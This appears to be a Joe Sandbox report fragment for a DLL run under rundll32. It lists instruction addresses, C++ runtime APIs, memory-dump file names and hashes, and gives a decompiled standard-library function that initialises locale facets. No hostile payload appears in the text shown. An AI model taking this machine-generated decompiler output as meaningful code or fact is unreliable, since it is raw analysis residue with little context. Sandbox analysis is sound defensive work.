0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
0x6e20fa2d
0x6e20fa2f
0x6e20fa35
0x6e20fa3b
0x6e20fa43
0x6e20fa46
0x6e20fa83
0x6e20fa91
0x6e20fa96
0x6e20fa9e
0x6e20faa8
0x6e20faad
0x6e20fab8
0x6e20fabc
0x6e20fabf
0x6e20fac4
0x6e20facd
0x6e20facf
0x6e20fad1
0x6e20fb16
0x6e20fb19
0x6e20fb25
0x6e20fad3
0x6e20fad3
0x6e20fad5
0x6e20fadb
0x6e20fae1
0x6e20fae9
0x6e20faec
0x6e20fb29
0x6e20fb37
0x6e20fb3c
0x6e20fb44
0x6e20fb4e
0x6e20fb53
0x6e20fb5e
0x6e20fb62
0x6e20fb65
0x6e20fb6a
0x6e20fb73
0x6e20fb75
0x6e20fb77
0x6e20fbbc
0x6e20fbbf
0x6e20fbcb
0x6e20fb79
0x6e20fb79
0x6e20fb7b
0x6e20fb81
0x6e20fb87
0x6e20fb8f
0x6e20fb92
0x6e20fbcf
0x6e20fbdd
0x6e20fbe2
0x6e20fbea
0x6e20fbf4
0x6e20fbf9
0x6e20fc04
0x6e20fc08
0x6e20fc0b
0x6e20fc10
0x6e20fc19
0x6e20fc1b
0x6e20fc1d
0x6e20fc62
0x6e20fc65
0x6e20fc71
0x6e20fc1f
0x6e20fc1f
0x6e20fc21
0x6e20fc27
0x6e20fc2d
0x6e20fc35
0x6e20fc38
0x6e20fc75
0x6e20fc83
0x6e20fc88
0x6e20fc90
0x6e20fc9a
0x6e20fc9f
0x6e20fcaa
0x6e20fcae
0x6e20fcb1
0x6e20fcb6
0x6e20fcbf
0x6e20fcc1
0x6e20fcc3
0x6e20fd08
0x6e20fd0b
0x6e20fd17
0x6e20fcc5
0x6e20fcc5
0x6e20fcc7
0x6e20fccd
0x6e20fcd3
0x6e20fcdb
0x6e20fcde
0x6e20fd18
0x6e20fd1b
0x6e20fd29
0x6e20fd2e
0x6e20fd36
0x6e20fd3b
0x6e20fd3d
0x6e20fd43
0x6e20fd46
0x6e20fd4f
0x6e20fd4f
0x6e20fd4f
0x6e20fd53
0x6e20fd59
0x6e20fd5c
0x6e20fd68
0x6e20fce0
0x6e20fce0
0x6e20fce3
0x6e20fce7
0x6e20fceb
0x6e20fcf8
0x6e20fd00
0x6e20fd02
0x00000000
0x6e20fd02
0x6e20fcc9
0x6e20fcc9
0x00000000
0x6e20fcc9
0x6e20fcc7
0x6e20fc3a
0x6e20fc3a
0x6e20fc3d
0x6e20fc41
0x6e20fc45
0x6e20fc52
0x6e20fc5a
0x6e20fc5c
0x00000000
0x6e20fc5c
0x6e20fc23
0x6e20fc23
0x00000000
0x6e20fc23
0x6e20fc21
0x6e20fb94
0x6e20fb94
0x6e20fb97
0x6e20fb9b
0x6e20fb9f
0x6e20fbac
0x6e20fbb4
0x6e20fbb6
0x00000000
0x6e20fbb6
0x6e20fb7d
0x6e20fb7d
0x00000000
0x6e20fb7d
0x6e20fb7b
0x6e20faee
0x6e20faee
0x6e20faf1
0x6e20faf5
0x6e20faf9
0x6e20fb06
0x6e20fb0e
0x6e20fb10
0x00000000
0x6e20fb10
0x6e20fad7
0x6e20fad7
0x00000000
0x6e20fad7
0x6e20fad5
0x6e20fa48
0x6e20fa48
0x6e20fa4b
0x6e20fa4f
0x6e20fa53
0x6e20fa60
0x6e20fa68
0x6e20fa6a
0x00000000
0x6e20fa6a
0x6e20fa31
0x6e20fa31
0x00000000
0x6e20fa31
0x6e20fa2f
0x6e20f9a2
0x6e20f9a2
0x6e20f9a5
0x6e20f9a9
0x6e20f9ad
0x6e20f9ba
0x6e20f9c2
0x6e20f9c4
0x00000000
0x6e20f9c4
0x6e20f98b
0x6e20f98b
0x00000000
0x6e20f98b
0x6e20f989
0x6e20f8fc
0x6e20f8fc
0x6e20f8ff
0x6e20f903
0x6e20f907
0x6e20f914
0x6e20f91c
0x6e20f91e
0x00000000
0x6e20f91e
0x6e20f8e5
0x6e20f8e5
0x00000000
0x6e20f8e5
0x6e20f8e3

APIs

__EH_prolog3.LIBCMT ref: 6E20F8AC
std::_Lockit::_Lockit.LIBCPMT ref: 6E20F8B6
int.LIBCPMT ref: 6E20F8CD

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

std::_Facet_Register.LIBCPMT ref: 6E20F907
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F927
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F945

Strings

dm,n, xrefs: 6E20F8C1

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: dm,n
API String ID: 651022567-1177862346
Opcode ID: c62049bfba2d9931af0c89e5a49a84c2050b416cba52b783378c154e42e0e512
Instruction ID: 7963a4779e0788762ceaea4ba09daf98973acaec55f14d88ed6e43071da81ed1
Opcode Fuzzy Hash: c62049bfba2d9931af0c89e5a49a84c2050b416cba52b783378c154e42e0e512
Instruction Fuzzy Hash: 2611E37590051E9BCF00DBE4C894AFEB7BBBF84718F240908E410AB2D0DBB49A45C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F4C1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E20F4C1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t195;
				signed int _t196;
				void* _t208;
				void* _t221;
				void* _t234;
				void* _t247;
				void* _t260;
				void* _t273;
				void* _t286;
				void* _t299;
				void* _t312;
				void* _t325;
				void* _t338;
				void* _t351;
				signed int _t511;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t570;
				signed int _t571;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				signed int _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				void* _t594;

				_t551 = __edx;
				_t420 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t594 - 0x14, 0);
				_t567 =  *0x6e2c6dc0; // 0x0
				 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
				 *(_t594 - 0x10) = _t567;
				_t195 = E6E1E161C(0x6e2c6d74);
				_t423 =  *((intOrPtr*)(_t594 + 8));
				_t196 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t195);
				_t553 = _t196;
				if(_t196 != 0) {
					L5:
					E6E2066BA(_t594 - 0x14);
					return E6E220075(_t553);
				} else {
					if(_t567 == 0) {
						_push( *((intOrPtr*)(_t594 + 8)));
						_push(_t594 - 0x10);
						__eflags = E6E2110BF(__ebx, _t423, __edx, _t553, _t567) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t594 - 0x20);
							E6E223D74(_t594 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t553, _t567, 0x14);
							E6E206653(_t594 - 0x14, 0);
							_t568 =  *0x6e2c6df8; // 0x0
							 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
							 *(_t594 - 0x10) = _t568;
							_t208 = E6E1E161C(0x6e2c6da4);
							_t430 =  *((intOrPtr*)(_t594 + 8));
							_t554 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t208);
							__eflags = _t554;
							if(_t554 != 0) {
								L12:
								E6E2066BA(_t594 - 0x14);
								return E6E220075(_t554);
							} else {
								__eflags = _t568;
								if(_t568 == 0) {
									_push( *((intOrPtr*)(_t594 + 8)));
									_push(_t594 - 0x10);
									__eflags = E6E211127(_t420, _t430, __edx, _t554, _t568) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t594 - 0x20);
										E6E223D74(_t594 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t420, _t554, _t568, 0x14);
										E6E206653(_t594 - 0x14, 0);
										_t569 =  *0x6e2c6df4; // 0x0
										 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
										 *(_t594 - 0x10) = _t569;
										_t221 = E6E1E161C(0x6e2c6da0);
										_t437 =  *((intOrPtr*)(_t594 + 8));
										_t555 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t221);
										__eflags = _t555;
										if(_t555 != 0) {
											L19:
											E6E2066BA(_t594 - 0x14);
											return E6E220075(_t555);
										} else {
											__eflags = _t569;
											if(_t569 == 0) {
												_push( *((intOrPtr*)(_t594 + 8)));
												_push(_t594 - 0x10);
												__eflags = E6E2111AB(_t420, _t437, __edx, _t555, _t569) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t594 - 0x20);
													E6E223D74(_t594 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t420, _t555, _t569, 0x14);
													E6E206653(_t594 - 0x14, 0);
													_t570 =  *0x6e2c6dc8; // 0x0
													 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
													 *(_t594 - 0x10) = _t570;
													_t234 = E6E1E161C(0x6e2c6d7c);
													_t444 =  *((intOrPtr*)(_t594 + 8));
													_t556 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t234);
													__eflags = _t556;
													if(_t556 != 0) {
														L26:
														E6E2066BA(_t594 - 0x14);
														return E6E220075(_t556);
													} else {
														__eflags = _t570;
														if(_t570 == 0) {
															_push( *((intOrPtr*)(_t594 + 8)));
															_push(_t594 - 0x10);
															__eflags = E6E211230(_t420, _t444, _t551, _t556, _t570) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t594 - 0x20);
																E6E223D74(_t594 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t420, _t556, _t570, 0x14);
																E6E206653(_t594 - 0x14, 0);
																_t571 =  *0x6e2c6dc4; // 0x0
																 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																 *(_t594 - 0x10) = _t571;
																_t247 = E6E1E161C(0x6e2c6d78);
																_t451 =  *((intOrPtr*)(_t594 + 8));
																_t557 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t247);
																__eflags = _t557;
																if(_t557 != 0) {
																	L33:
																	E6E2066BA(_t594 - 0x14);
																	return E6E220075(_t557);
																} else {
																	__eflags = _t571;
																	if(_t571 == 0) {
																		_push( *((intOrPtr*)(_t594 + 8)));
																		_push(_t594 - 0x10);
																		__eflags = E6E2112B4(_t420, _t451, _t551, _t557, _t571) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t594 - 0x20);
																			E6E223D74(_t594 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t420, _t557, _t571, 0x14);
																			E6E206653(_t594 - 0x14, 0);
																			_t572 =  *0x6e2c6dd8; // 0x0
																			 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																			 *(_t594 - 0x10) = _t572;
																			_t260 = E6E1E161C(0x6e2c6d84);
																			_t458 =  *((intOrPtr*)(_t594 + 8));
																			_t558 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t260);
																			__eflags = _t558;
																			if(_t558 != 0) {
																				L40:
																				E6E2066BA(_t594 - 0x14);
																				return E6E220075(_t558);
																			} else {
																				__eflags = _t572;
																				if(_t572 == 0) {
																					_push( *((intOrPtr*)(_t594 + 8)));
																					_push(_t594 - 0x10);
																					__eflags = E6E211339(_t420, _t458, _t551, _t558, _t572) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t594 - 0x20);
																						E6E223D74(_t594 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t420, _t558, _t572, 0x14);
																						E6E206653(_t594 - 0x14, 0);
																						_t573 =  *0x6e2c6db0; // 0x0
																						 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																						 *(_t594 - 0x10) = _t573;
																						_t273 = E6E1E161C(0x6e2c6d64);
																						_t465 =  *((intOrPtr*)(_t594 + 8));
																						_t559 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t273);
																						__eflags = _t559;
																						if(_t559 != 0) {
																							L47:
																							E6E2066BA(_t594 - 0x14);
																							return E6E220075(_t559);
																						} else {
																							__eflags = _t573;
																							if(_t573 == 0) {
																								_push( *((intOrPtr*)(_t594 + 8)));
																								_push(_t594 - 0x10);
																								__eflags = E6E2113A1(_t420, _t465, _t551, _t559, _t573) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t594 - 0x20);
																									E6E223D74(_t594 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t420, _t559, _t573, 0x14);
																									E6E206653(_t594 - 0x14, 0);
																									_t574 =  *0x6e2c6ddc; // 0x0
																									 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																									 *(_t594 - 0x10) = _t574;
																									_t286 = E6E1E161C(0x6e2c6d88);
																									_t472 =  *((intOrPtr*)(_t594 + 8));
																									_t560 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t286);
																									__eflags = _t560;
																									if(_t560 != 0) {
																										L54:
																										E6E2066BA(_t594 - 0x14);
																										return E6E220075(_t560);
																									} else {
																										__eflags = _t574;
																										if(_t574 == 0) {
																											_push( *((intOrPtr*)(_t594 + 8)));
																											_push(_t594 - 0x10);
																											__eflags = E6E211409(_t420, _t472, _t551, _t560, _t574) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t594 - 0x20);
																												E6E223D74(_t594 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t420, _t560, _t574, 0x14);
																												E6E206653(_t594 - 0x14, 0);
																												_t575 =  *0x6e2c6de0; // 0x0
																												 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																												 *(_t594 - 0x10) = _t575;
																												_t299 = E6E1E161C(0x6e2c6d8c);
																												_t479 =  *((intOrPtr*)(_t594 + 8));
																												_t561 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t299);
																												__eflags = _t561;
																												if(_t561 != 0) {
																													L61:
																													E6E2066BA(_t594 - 0x14);
																													return E6E220075(_t561);
																												} else {
																													__eflags = _t575;
																													if(_t575 == 0) {
																														_push( *((intOrPtr*)(_t594 + 8)));
																														_push(_t594 - 0x10);
																														__eflags = E6E211471(_t420, _t479, _t551, _t561, _t575) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t594 - 0x20);
																															E6E223D74(_t594 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t420, _t561, _t575, 0x14);
																															E6E206653(_t594 - 0x14, 0);
																															_t576 =  *0x6e2c6dfc; // 0x0
																															 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																															 *(_t594 - 0x10) = _t576;
																															_t312 = E6E1E161C(0x6e2c6da8);
																															_t486 =  *((intOrPtr*)(_t594 + 8));
																															_t562 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t312);
																															__eflags = _t562;
																															if(_t562 != 0) {
																																L68:
																																E6E2066BA(_t594 - 0x14);
																																return E6E220075(_t562);
																															} else {
																																__eflags = _t576;
																																if(_t576 == 0) {
																																	_push( *((intOrPtr*)(_t594 + 8)));
																																	_push(_t594 - 0x10);
																																	__eflags = E6E2114EC(_t420, _t486, _t551, _t562, _t576) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t594 - 0x20);
																																		E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t420, _t562, _t576, 0x14);
																																		E6E206653(_t594 - 0x14, 0);
																																		_t577 =  *0x6e2c6dcc; // 0x0
																																		 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																		 *(_t594 - 0x10) = _t577;
																																		_t325 = E6E1E161C(0x6e2c6d80);
																																		_t493 =  *((intOrPtr*)(_t594 + 8));
																																		_t563 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t325);
																																		__eflags = _t563;
																																		if(_t563 != 0) {
																																			L75:
																																			E6E2066BA(_t594 - 0x14);
																																			return E6E220075(_t563);
																																		} else {
																																			__eflags = _t577;
																																			if(_t577 == 0) {
																																				_push( *((intOrPtr*)(_t594 + 8)));
																																				_push(_t594 - 0x10);
																																				__eflags = E6E211558(_t420, _t493, _t551, _t563, _t577) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t594 - 0x20);
																																					E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t420, _t563, _t577, 0x14);
																																					E6E206653(_t594 - 0x14, 0);
																																					_t578 =  *0x6e2c6e00; // 0x0
																																					 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																					 *(_t594 - 0x10) = _t578;
																																					_t338 = E6E1E161C(0x6e2c6dac);
																																					_t500 =  *((intOrPtr*)(_t594 + 8));
																																					_t564 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t338);
																																					__eflags = _t564;
																																					if(_t564 != 0) {
																																						L82:
																																						E6E2066BA(_t594 - 0x14);
																																						return E6E220075(_t564);
																																					} else {
																																						__eflags = _t578;
																																						if(_t578 == 0) {
																																							_push( *((intOrPtr*)(_t594 + 8)));
																																							_push(_t594 - 0x10);
																																							__eflags = E6E2115C4(_t420, _t500, _t551, _t564, _t578) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t594 - 0x20);
																																								E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t420, _t564, _t578, 0x14);
																																								E6E206653(_t594 - 0x14, 0);
																																								_t579 =  *0x6e2c6dd0; // 0x0
																																								 *(_t594 - 4) =  *(_t594 - 4) & 0x00000000;
																																								 *(_t594 - 0x10) = _t579;
																																								_t351 = E6E1E161C(0x6e2c6d60);
																																								_t507 =  *((intOrPtr*)(_t594 + 8));
																																								_t565 = E6E1E171B( *((intOrPtr*)(_t594 + 8)), _t351);
																																								__eflags = _t565;
																																								if(_t565 != 0) {
																																									L89:
																																									E6E2066BA(_t594 - 0x14);
																																									return E6E220075(_t565);
																																								} else {
																																									__eflags = _t579;
																																									if(_t579 == 0) {
																																										_push( *((intOrPtr*)(_t594 + 8)));
																																										_push(_t594 - 0x10);
																																										__eflags = E6E21162A(_t420, _t507, _t551, _t565, _t579) - 0xffffffff;
																																										if(__eflags == 0) {
																																											_t511 = _t594 - 0x20;
																																											E6E1E1438(_t511);
																																											E6E223D74(_t594 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e26851f, _t420, _t565, _t579, 4);
																																											_t580 = _t511;
																																											 *(_t594 - 0x10) = _t580;
																																											 *((intOrPtr*)(_t580 + 4)) =  *((intOrPtr*)(_t594 + 0xc));
																																											_push( *((intOrPtr*)(_t594 + 0x14)));
																																											_t189 = _t594 - 4;
																																											 *_t189 =  *(_t594 - 4) & 0x00000000;
																																											__eflags =  *_t189;
																																											 *_t580 = 0x6e26c0c4;
																																											 *((char*)(_t580 + 0x28)) =  *((intOrPtr*)(_t594 + 0x10));
																																											E6E21542F(_t420, _t511, _t551, _t565, _t580,  *_t189);
																																											return E6E220075(_t580,  *((intOrPtr*)(_t594 + 8)));
																																										} else {
																																											_t565 =  *(_t594 - 0x10);
																																											 *(_t594 - 0x10) = _t565;
																																											 *(_t594 - 4) = 1;
																																											E6E206FD3(__eflags, _t565);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t565 + 4))))();
																																											 *0x6e2c6dd0 = _t565;
																																											goto L89;
																																										}
																																									} else {
																																										_t565 = _t579;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t564 =  *(_t594 - 0x10);
																																								 *(_t594 - 0x10) = _t564;
																																								 *(_t594 - 4) = 1;
																																								E6E206FD3(__eflags, _t564);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t564 + 4))))();
																																								 *0x6e2c6e00 = _t564;
																																								goto L82;
																																							}
																																						} else {
																																							_t564 = _t578;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t563 =  *(_t594 - 0x10);
																																					 *(_t594 - 0x10) = _t563;
																																					 *(_t594 - 4) = 1;
																																					E6E206FD3(__eflags, _t563);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t563 + 4))))();
																																					 *0x6e2c6dcc = _t563;
																																					goto L75;
																																				}
																																			} else {
																																				_t563 = _t577;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t562 =  *(_t594 - 0x10);
																																		 *(_t594 - 0x10) = _t562;
																																		 *(_t594 - 4) = 1;
																																		E6E206FD3(__eflags, _t562);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t562 + 4))))();
																																		 *0x6e2c6dfc = _t562;
																																		goto L68;
																																	}
																																} else {
																																	_t562 = _t576;
																																	goto L68;
																																}
																															}
																														} else {
																															_t561 =  *(_t594 - 0x10);
																															 *(_t594 - 0x10) = _t561;
																															 *(_t594 - 4) = 1;
																															E6E206FD3(__eflags, _t561);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t561 + 4))))();
																															 *0x6e2c6de0 = _t561;
																															goto L61;
																														}
																													} else {
																														_t561 = _t575;
																														goto L61;
																													}
																												}
																											} else {
																												_t560 =  *(_t594 - 0x10);
																												 *(_t594 - 0x10) = _t560;
																												 *(_t594 - 4) = 1;
																												E6E206FD3(__eflags, _t560);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t560 + 4))))();
																												 *0x6e2c6ddc = _t560;
																												goto L54;
																											}
																										} else {
																											_t560 = _t574;
																											goto L54;
																										}
																									}
																								} else {
																									_t559 =  *(_t594 - 0x10);
																									 *(_t594 - 0x10) = _t559;
																									 *(_t594 - 4) = 1;
																									E6E206FD3(__eflags, _t559);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t559 + 4))))();
																									 *0x6e2c6db0 = _t559;
																									goto L47;
																								}
																							} else {
																								_t559 = _t573;
																								goto L47;
																							}
																						}
																					} else {
																						_t558 =  *(_t594 - 0x10);
																						 *(_t594 - 0x10) = _t558;
																						 *(_t594 - 4) = 1;
																						E6E206FD3(__eflags, _t558);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t558 + 4))))();
																						 *0x6e2c6dd8 = _t558;
																						goto L40;
																					}
																				} else {
																					_t558 = _t572;
																					goto L40;
																				}
																			}
																		} else {
																			_t557 =  *(_t594 - 0x10);
																			 *(_t594 - 0x10) = _t557;
																			 *(_t594 - 4) = 1;
																			E6E206FD3(__eflags, _t557);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t557 + 4))))();
																			 *0x6e2c6dc4 = _t557;
																			goto L33;
																		}
																	} else {
																		_t557 = _t571;
																		goto L33;
																	}
																}
															} else {
																_t556 =  *(_t594 - 0x10);
																 *(_t594 - 0x10) = _t556;
																 *(_t594 - 4) = 1;
																E6E206FD3(__eflags, _t556);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t556 + 4))))();
																 *0x6e2c6dc8 = _t556;
																goto L26;
															}
														} else {
															_t556 = _t570;
															goto L26;
														}
													}
												} else {
													_t555 =  *(_t594 - 0x10);
													 *(_t594 - 0x10) = _t555;
													 *(_t594 - 4) = 1;
													E6E206FD3(__eflags, _t555);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t555 + 4))))();
													 *0x6e2c6df4 = _t555;
													goto L19;
												}
											} else {
												_t555 = _t569;
												goto L19;
											}
										}
									} else {
										_t554 =  *(_t594 - 0x10);
										 *(_t594 - 0x10) = _t554;
										 *(_t594 - 4) = 1;
										E6E206FD3(__eflags, _t554);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t554 + 4))))();
										 *0x6e2c6df8 = _t554;
										goto L12;
									}
								} else {
									_t554 = _t568;
									goto L12;
								}
							}
						} else {
							_t553 =  *(_t594 - 0x10);
							 *(_t594 - 0x10) = _t553;
							 *(_t594 - 4) = 1;
							E6E206FD3(__eflags, _t553);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t553 + 4))))();
							 *0x6e2c6dc0 = _t553;
							goto L5;
						}
					} else {
						_t553 = _t567;
						goto L5;
					}
				}
			}

0x6e20f4c1
0x6e20f4c1
0x6e20f4c8
0x6e20f4d2
0x6e20f4d7
0x6e20f4e2
0x6e20f4e6
0x6e20f4e9
0x6e20f4ee
0x6e20f4f2
0x6e20f4f7
0x6e20f4fb
0x6e20f540
0x6e20f543
0x6e20f54f
0x6e20f4fd
0x6e20f4ff
0x6e20f505
0x6e20f50b
0x6e20f513
0x6e20f516
0x6e20f553
0x6e20f561
0x6e20f566
0x6e20f56e
0x6e20f578
0x6e20f57d
0x6e20f588
0x6e20f58c
0x6e20f58f
0x6e20f594
0x6e20f59d
0x6e20f59f
0x6e20f5a1
0x6e20f5e6
0x6e20f5e9
0x6e20f5f5
0x6e20f5a3
0x6e20f5a3
0x6e20f5a5
0x6e20f5ab
0x6e20f5b1
0x6e20f5b9
0x6e20f5bc
0x6e20f5f9
0x6e20f607
0x6e20f60c
0x6e20f614
0x6e20f61e
0x6e20f623
0x6e20f62e
0x6e20f632
0x6e20f635
0x6e20f63a
0x6e20f643
0x6e20f645
0x6e20f647
0x6e20f68c
0x6e20f68f
0x6e20f69b
0x6e20f649
0x6e20f649
0x6e20f64b
0x6e20f651
0x6e20f657
0x6e20f65f
0x6e20f662
0x6e20f69f
0x6e20f6ad
0x6e20f6b2
0x6e20f6ba
0x6e20f6c4
0x6e20f6c9
0x6e20f6d4
0x6e20f6d8
0x6e20f6db
0x6e20f6e0
0x6e20f6e9
0x6e20f6eb
0x6e20f6ed
0x6e20f732
0x6e20f735
0x6e20f741
0x6e20f6ef
0x6e20f6ef
0x6e20f6f1
0x6e20f6f7
0x6e20f6fd
0x6e20f705
0x6e20f708
0x6e20f745
0x6e20f753
0x6e20f758
0x6e20f760
0x6e20f76a
0x6e20f76f
0x6e20f77a
0x6e20f77e
0x6e20f781
0x6e20f786
0x6e20f78f
0x6e20f791
0x6e20f793
0x6e20f7d8
0x6e20f7db
0x6e20f7e7
0x6e20f795
0x6e20f795
0x6e20f797
0x6e20f79d
0x6e20f7a3
0x6e20f7ab
0x6e20f7ae
0x6e20f7eb
0x6e20f7f9
0x6e20f7fe
0x6e20f806
0x6e20f810
0x6e20f815
0x6e20f820
0x6e20f824
0x6e20f827
0x6e20f82c
0x6e20f835
0x6e20f837
0x6e20f839
0x6e20f87e
0x6e20f881
0x6e20f88d
0x6e20f83b
0x6e20f83b
0x6e20f83d
0x6e20f843
0x6e20f849
0x6e20f851
0x6e20f854
0x6e20f891
0x6e20f89f
0x6e20f8a4
0x6e20f8ac
0x6e20f8b6
0x6e20f8bb
0x6e20f8c6
0x6e20f8ca
0x6e20f8cd
0x6e20f8d2
0x6e20f8db
0x6e20f8dd
0x6e20f8df
0x6e20f924
0x6e20f927
0x6e20f933
0x6e20f8e1
0x6e20f8e1
0x6e20f8e3
0x6e20f8e9
0x6e20f8ef
0x6e20f8f7
0x6e20f8fa
0x6e20f937
0x6e20f945
0x6e20f94a
0x6e20f952
0x6e20f95c
0x6e20f961
0x6e20f96c
0x6e20f970
0x6e20f973
0x6e20f978
0x6e20f981
0x6e20f983
0x6e20f985
0x6e20f9ca
0x6e20f9cd
0x6e20f9d9
0x6e20f987
0x6e20f987
0x6e20f989
0x6e20f98f
0x6e20f995
0x6e20f99d
0x6e20f9a0
0x6e20f9dd
0x6e20f9eb
0x6e20f9f0
0x6e20f9f8
0x6e20fa02
0x6e20fa07
0x6e20fa12
0x6e20fa16
0x6e20fa19
0x6e20fa1e
0x6e20fa27
0x6e20fa29
0x6e20fa2b
0x6e20fa70
0x6e20fa73
0x6e20fa7f
0x6e20fa2d
